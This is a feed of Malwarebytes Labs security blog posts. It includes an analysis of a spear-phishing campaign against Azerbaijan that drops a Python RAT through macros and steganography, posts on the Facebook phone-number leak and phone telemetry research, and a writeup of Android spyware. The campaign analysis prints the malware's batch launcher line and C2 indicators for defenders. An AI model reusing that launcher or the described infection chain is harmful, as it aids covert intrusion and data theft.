Malware Bytes Security - Tue, 04/06/2021 - 3:24pm

This post was authored by Hossein Jazi

As tensions between Azerbaijan and Armenia continue, we are still seeing a number of cyber attacks taking advantage of this situation. On March 5th 2021, we reported an actor that used steganography to drop a new .Net Remote Administration Trojan. Since that time, we have been monitoring this actor and were able to identify new activity where the threat actor switched their RAT from .Net to Python.

Document Analysis

The document targets the government of Azerbaijan using a SOCAR letter template as lure. SOCAR is the name of Azerbaijan’s Republic Oil and Gas Company. The document’s date is 25th March 2021 and the letter, related to export of catalyst for analysis, is written to the Ministry of Ecology and Natural Resources. The document’s creation time is 28th March 2021 and is aligned with the date mentioned on the letter. Based on the dates we believe that this attack happened between 28th and 30th of March 2021.

Figure 1: Document lure

The embedded macro in this document is almost similar to what we have reported before with some small differences. We will talk about the similarities between these two documents in the next section.

The macro has two main functions “Document_Open” and “Document_Close”. In “Document_Open” after defining the required variables it creates a directory (%APPDATA%\Roaming\nettools48\) for its Python Rat.

Figure 2: Document_Open

It then copies itself in a new format to the file path defined before in order to be able to extract the required data from an embedded PNG file (image1.png).

Figure 3: Embedded image

To extract the embedded data, it calls the “ExtractFromPng” function to identify the chunk that has the embedded data. After finding the chunk, it extracts the files from the PNG file and writes them into “tmp.zip”.

Figure 4: Chunk identification

The “tmp.zip” is then extracted into “%APPDATA%\Roaming\nettools48” directory. It contains the Python 3.6 interpreter, NetTools Python library, Python Rat, the RAT C2 config, as well runner.bat.

Figure 5: Application directory

The Python Rat will be executed when the document is closed. The “Document_Close” first delays execution to bypass security detection mechanisms by creating a junk loop for 100 times and then executes the runner.bat by calling Shell function.

Figure 6: Document_Close

The runner.bat is also delaying execution for 64 seconds and then it calls Python to execute the Python RAT (vabsheche.py)

SET /A num=%RANDOM% * (80 - 60 + 1) / 32768 + 60 timeout /t %num% set DIR=%~dp0 "%DIR%\python" "%DIR%\vabsheche.py" Python RAT Analysis

The Python RAT used by the attacker is not obfuscated and is pretty simple. It is using the platform library to identify the victim’s OS type.

Figure 7: OS identification

The C2 domain and port are hardcoded within a file in the RAT directory. The RAT opens this file and extracts the host and port from this file.

Figure 8: Reads C2 config

In the next step if the victim is running Windows, it makes itself persistent through creating a scheduled task. It first checks if a scheduled task with the name “paurora*” exists or not. If it does not exist, it reads the content of bg.txt file and creates a bg.vbs file. Then adds the created VBS file to the list of scheduled tasks.

Figure 9: Creates Scheduled task

The created VBS file calls the runner.bat to execute the Python RAT.

Figure 10: Scheduled task

The main functionality of the RAT is through a loop that starts by creating a secure SSL connection to the server using a certificate file (cert.pem) that was extracted from the PNG file and dropped into the RAT directory.

Figure 11: Makes secure connection to server

After building the secure connection to the server it goes to a loop that receives a message from the server and executes different commands based on the message type.

Figure 12: Executes commands

Here is the list of commands that can be executed by the RAT:

  • OPEN_NEW_CONNECTION: Sends a message to the server with False as content
  • HEART_BEAT: Sends a message to the server that the victim is alive
  • USER_INFO: Collects victim info including OS Name, OS Version and User Name
  • SHELL: Executes shell commands received from the server
  • PREPARE_UPLOAD: Checks if it can open a file to write the received data from server into it and if that is the case it sends a “Ready” message to the server
  • UPLOAD: Receives a buffer from the server and writes them into file
  • DOWNLOAD: Archives files and sends them to the server
Similarity Analysis

In this sections we provide the similarities between two documents and TTPs used by them. This will help hunters to identify the future campaigns associated with this actor.

TTPs similarities
  • Used steganography to embed RATs within the embedded images.
  • Used scheduled tasks for persistence. In both cases It created a VBS file to execute the batch runner.
  • Used a batch file with the same name (runner.bat) to execute the final RAT.
  • Used the same technique to exfiltrate data. (Archive them and send them to the server)
Documents similarities
  • Both have been obfuscated using same obfuscation techniques: Inserting random characters within the meaningful names to obfuscate the functions and variables names. After deobfuscation, the function graph of these two documents are almost similar.
Figure 13: Socar.doc Figure 14: telebler.doc
  • Both have used the similar method to obfuscate strings: using “MyFunc23” function that receives an array of numbers and decodes them into a string.
Other similarities
  • both C2 domains have resolved to the same IP address.
  • There are overlaps between the commands used by both .Net and Python RATs.
Conclusion

Due to tensions between Azerbaijan and Armenia, cyber attacks against these countries have been increasing in the past year. The Malwarebytes Threat Intelligence Team is constantly monitoring actors that are targeting these countries and was able to identify an actor that has targeted Azerbaijan using different RATs. This actor has used .Net and Python RATs to infect victims and steal data from them. The actor used spear phishing as initial vector that has used steganography to drop a variant of its RATs.

IOCs socar.doc42f5f5474431738f91f612d9765b3fc9b85a547274ea64aa034298ad97ad28f4 runner.bat82eb05b9d4342f5485d337a24c95f951c5a1eb9960880cc3d61bce1d12d27b72vabsheche.pye45ffc61a85c2f5c0cbe9376ff215cad324bf14f925bf52ec0d2949f7d235a00bg.vbs1be8d33d8fca08c2886fa4e28fa4af8d35828ea5fd6b41dcad6aeb79d0494b67C2 Domainpook.mywire[.]orgC2 IP111.90.150.37

The post Aurora campaign: Attacking Azerbaijan using multiple RATs appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Has Facebook leaked your phone number?

Malware Bytes Security - Tue, 04/06/2021 - 8:07am

Unless you keep your social media at a pole’s distance, you have probably heard that an absolutely enormous dataset—containing over 500 million phone numbers—has been made public. These phone numbers have been in the hands of some cybercriminals since 2019 due to a vulnerability in Facebook that allowed personal data to be scraped from the social media platform, until it was patched it in 2019.

But now some miscreant has posted the entire dataset on a hacking forum, so every lowlife out there has access.

When did this happen?

In an apparent attempt to play down the seriousness of the situation, Facebook spokesperson Liz Bourgeois tweeted Saturday that the leak involved “old data that was previously reported on in 2019.” Some reports say the data was scraped in 2019, others talk about early 2020. To be honest, between scraping vulnerabilities dating back to 2010, and the Cambridge Analytica scandal, an old data breach is still a data breach, and you’re probably still going to need to pay attention to it. Whether you like it or not.

If you are, or were, a Facebook user this may very well concern you.

Why it still matters

Access to personal data allows cybercriminals to seem more believable when they pretend to be somebody, making social engineering and ID theft easier, and unlike passwords, many of them can’t be changed. There are countless examples of how personal information helps criminals, but here are three to give you a sense of what’s at stake.

The first thing that comes to mind is a scam where people text you pretending to be a relative or dear friend. First, they tell you they have a new phone number and then they ask you to transfer some money on their behalf.

The scam is more likely to succeed if the threat-actor has some private information that can convince you they are who they claim to be. And with the correlation between your Facebook profile and your telephone number, depending on your settings they can look up:

  • Who your family and friends are
  • How you phrase your responses to each other
  • Some events from your life to talk about

Together with your phone number, that gives them an excellent attack vector for this type of scam.

Another devilish scheme can unfold if they have enough information about you to convince your telephone company that they are the cell phone owner. This can usually be done by providing the carrier with a phone number, a home address and the last four digits of a Social Security number.

Or you could become a victim of a text variant of a Business Email Compromise (BEC). One of the most profitable phishing scams, which is easier to pull off if the threat actor has more information available.

Limiting what you share

First off, cybercriminals don’t care where or how they get your information, so take care to hide your personal information on Facebook from profile visitors that are not friends. Facebook has a help page for this called Control Who Can See What You Share.

Go through that list and ask yourself if everyone needs to see all of that, and what you would rather hide from prying eyes.

Also, now that you know the information is out there, be vigilant, especially about unsolicited texts and phone calls. If any new tactics evolve from this you can always read about it right here.

How to check if your phone number is involved

There are a few sites that offer you the chance to look up your phone number and see if it’s been leaked. One that we trust, and that allows visitors to look for phone numbers from every country is the well-known have i been pwned?

Troy Hunt, the security guru that runs HaveIBeenPwned, explains in detail why he decided to include this dataset as a searchable entity on his blog. If you are too curious and want to dive right in, please note that you need to enter your phone number in the E.164 international standard format. Which is not as hard as it sounds. Replace the trailing 0 with your country code, only use numbers, and you should be good to go.

Stay safe, everyone!

The post Has Facebook leaked your phone number? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Research claims Google Pixel phones share 20 times more data than iPhones

Malware Bytes Security - Tue, 04/06/2021 - 7:37am

If you’re an Android phone user, now might be a good time to invest in a good pair of ear plugs. Fans of iPhones aren’t known for being shy when it comes to telling Android users that Apple products are superior, and things may be about to get worse, thanks to a new research paper (pdf)

Researchers of the School of Computer Science and Statistics at Trinity College Dublin, Ireland decided to investigate what data iOS on an iPhone shares with Apple and what data Google Android on a Pixel phone shares with Google. Whilst it may not be the smoking gun some think it is (we think the sheer amount of telemetry data may come as a surprise for both sides of the argument), it didn’t go well for Android.

Research outline 

To get fair results a researcher needs to define experiments that can be applied uniformly to the handsets studied, to allow for direct comparisons, and the experiment needs to generate reproducible behavior. The research team decided to focus on the handset operating system itself, separate from optional services such as maps, search engines, cloud storage, and other services provided by Google and Apple. Although these come with practically every device, privacy-conscious minds are prone to disable these services.

The user profile was set to mimic a privacy-conscious but busy/non-technical user, who when asked does not select options that share data with Apple and Google. Otherwise, the handset settings were left at their default value. 

Test moments 

Data transfer was measured at 6 specific points of action during the phones’ normal use: 

  • On first startup following a factory reset 
  • When a SIM was inserted/removed 
  • When a handset was left idle 
  • When the settings screen was viewed 
  • When geolocation services were enabled/disabled 
  • When the user logged in to the pre-installed app store 
Test results 

Both iOS and Google Android transmit telemetry, despite the user settings. According to the research, both Android and iOS handsets shared data with Google and Apple servers every 4.5 minutes, on average.

Android handsets however, share 20 times more telemetry data than iPhones, it seems. During the first 10 minutes of startup the Pixel handset in the test sent around 1MB of data to Google, compared with the 42KB of data the iPhone sent to Apple. When the handsets were sitting idle the Pixel sent roughly 1MB of data to Google every 12 hours compared with the iPhone’s 52KB sent to Apple.

We should be careful not to draw too many conclusions from just the size of the data though. The quantity of data can be affected by things like the choice of protocols and whether or not compression is used. What matters far more, is the type of information being shared.

Type of information 

Researchers noted that devices on default privacy settings share information related to the IMEI, SIM serial number, phone number, hardware serial number, location, cookies, local IP address, nearby WiFi MAC addresses, and advertising ID. When a user has not yet logged in, Android phones don’t send location, IP address, and nearby WiFi MAC addresses, while iPhones don’t send their own WiFi MAC address. 

Unused apps and services 

Several of the pre-installed apps/services are also observed to make network connections, despite never having been opened or used. In particular, on iOS these include Siri, Safari and iCloud. On Google Android these include the YouTube app, Chrome, Google Docs, Safetyhub, Google Messaging, the Clock and the Google Search bar. 

Concerns 

The collection of so much data by Apple and Google raises some major concerns. Firstly, this device data can be fairly easily linked to other data sources. This is certainly no hypothetical concern since both Apple and Google operate payment services, supply popular web browsers, and benefit commercially from advertising.  

Secondly, every time a handset connects with a back-end server it necessarily reveals the handset’s IP address, which is a rough proxy for location. The high frequency of network connections made by both iOS and Google Android (on average every 4.5 minutes) therefore potentially allow tracking by Apple and Google of device location over time.  

And last but not least, the apparent inability for users to opt out. In the report the head researcher outlines a method to prevent the vast majority of the data sharing but noted that it needs to be tested against other types of handhelds. And from my perspective it’s not easy to pull it off, and it would not stop everything. 

Apple and Google do not agree 

The head researcher sent his findings to both companies. Google offered some clarifications and expressed its intention to publish documentation on the telemetry data collection soon. 

Apple noted that the report gets many things wrong. For instance, the company says that personal data sent to Apple is protected, and the company doesn’t collect data that can be associated with a person without their knowledge or consent. Google calls into question the methods used to determine the telemetry volume on Android and iOS. It claims the study didn’t capture UDP/QUIC traffic, nor did it look at whether the data was compressed or not, which could skew the results. 

The post Research claims Google Pixel phones share 20 times more data than iPhones appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (March 29 – April 4)

Malware Bytes Security - Mon, 04/05/2021 - 12:08pm

Last week on Malwarebytes Labs, our podcast featured Malwarebytes senior security researcher JP Taggart, who talked to us about why you need to trust your VPN.

You’ve likely heard the benefits of using a VPN: You can watch TV shows restricted to certain countries, you can encrypt your web traffic on public WiFi networks, and, importantly, you can obscure your Internet activity from your Internet Service Provider, which may use that activity for advertising.

But obscuring your Internet activity—including the websites you visit, the searches you make, the files you download—doesn’t mean that a VPN magically disappears those things. It just means that the VPN itself gets to see that information instead.

On Malwarebytes Labs, we also wrote about six social media safety sins to say goodbye to, and we advised Steam users not to fall for the “I accidentally reported” scam that is making rounds right now. We also covered how a 5G slicing vulnerability could be used in DoS attacks, the one reason your iPhone needs a VPN, what you need to know about malicious commits found in PHP code repository, the latest ransomware attacking schools, called PYSA, and we tried to report on the npm netmask vulnerability in a way that anyone can actually understand it.

Finally, we looked at the latest Android “System Update” malware that steals photos, videos, GPS location, and we thought it was time to cool down some fervor and say that, you know what, Internet password books are OK.

Other Cybersecurity news:

Stay safe!

The post A week in security (March 29 – April 4) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Android “System Update” malware steals photos, videos, GPS location

Malware Bytes Security - Thu, 04/01/2021 - 3:47pm

A newly discovered piece of Android malware shares the same capabilities found within many modern stalkerware-type apps—it can swipe images and video, rifle through online searches, record phone calls and video, and peer into GPS location data—but the infrastructure behind the malware obscures its developer’s primary motivations.

First spotted by the research team at Zimperium zLabs, the newly found malware is already detected by Malwarebytes for Android. It does not have a catchy name, but because of its capabilities and its method for going unnoticed, we are calling it Android/Trojan.Spy.FakeSysUpdate, or in this blog, “FakeSysUpdate” for short.

FakeSysUpdate is not available on the Google Play store, and it is currently unclear how it is being delivered to Android devices. Even more obscured is the visibility of the app to victims.

Once FakeSysUpdate is implanted on a device, it disguises itself to its victims by masquerading as a generic “System Update” application. In fact, when a threat actor uses FakeSysUpdate to steal targeted information from an infected, asleep device, FakeSysUpdate will also send a fraudulent notification posing as a “System Update” that is “Searching for update.”

Beneath the surface, FakeSysUpdate can let a malicious actor steal highly sensitive information while also granting them dangerous control of a victim’s device.

According to Zimperium zLabs, the malware can allow a threat actor to monitor GPS locations, record phone calls, record ambient audio, take photos from the front-facing and rear-facing cameras on a device, observe the device’s installed applications, inspect bookmark and search history from Google Chrome, Mozilla Firefox, and Samsung Internet Browser, and steal SMS messages, phone contacts, and call logs.

If you’ve read our coverage on these types of capabilities in the past, you might think that FakeSysUpdate is just the latest stalkerware-type app on the market. After all, the threats of stalkerware are near identical—pinpointed GPS locations that can reveal a domestic abuse survivor’s location after escape, stolen text messages that can uncover a survivor’s safety planning, and broad, non-consensual invasions of privacy that can harm anyone.

But the inner workings of FakeSysUpdate potentially betray the common uses of stalkerware.

First, according to the researchers at Zimperium zLabs, once the malware is installed on a device, the device is registered with the Firebase Command and Control (C2), upon which a threat actor can send commands through the Firebase messaging service to, for instance, steal a device’s contacts list, record microphone audio, or take a picture using the device’s cameras.

At issue here is who can send the C2 commands. If the commands can be sent by the apps users’, so they can spy on their victims, then it looks like a stalkerware-type app. If the commands can only be issued by the app’s creators, then there’s a good chance that FakeSysUpdate is not stalkerware, but information-gathering spyware. Unlike stalkerware, most (but not all) spyware doesn’t care who its victims are—it is simply looking for information that can be used for extortion or to facilitate further attacks with malware.

That’s contrary to many of the stalkerware-type apps that we see, which are, for lack of a better word, “user-friendly.” They do not require a high-tech proficiency to use or understand. They do not have illegible interfaces. Instead, these apps have familiar layouts, intuitive designs, and easy-to-use commands. For many apps, it’s as simple as logging into a web platform, clicking a menu item, and browsing through private photos without any consent.

Which brings us to the second point: If this piece of malware isn’t being advertised—or if it isn’t really known—as a stalkerware-type app, then it’s less likely that it’s been built as one.

Stalkerware-type apps do not hide in the shadows. They flood Google results for anyone searching how to spy on their romantic partners. They place sponsored articles in major city newspapers (yes, really). The more egregious ones even advertise themselves specifically on their so-called abilities to “catch” cheating partners.

Without knowing how FakeSysUpdate is being advertised—which relates to our lacking information on how it is primarily being delivered to devices—we cannot definitively ascertain its purpose.

Despite the uncertainty, though, one thing is clear: This piece of malware could be devastating. Whether for malicious information gathering or for non-consensual surveillance of a romantic partner, these invasions of privacy are flat-out wrong.

We thank Zimperium zLabs for discovering this malware and for bringing it to the public’s attention.

The post Android “System Update” malware steals photos, videos, GPS location appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Pages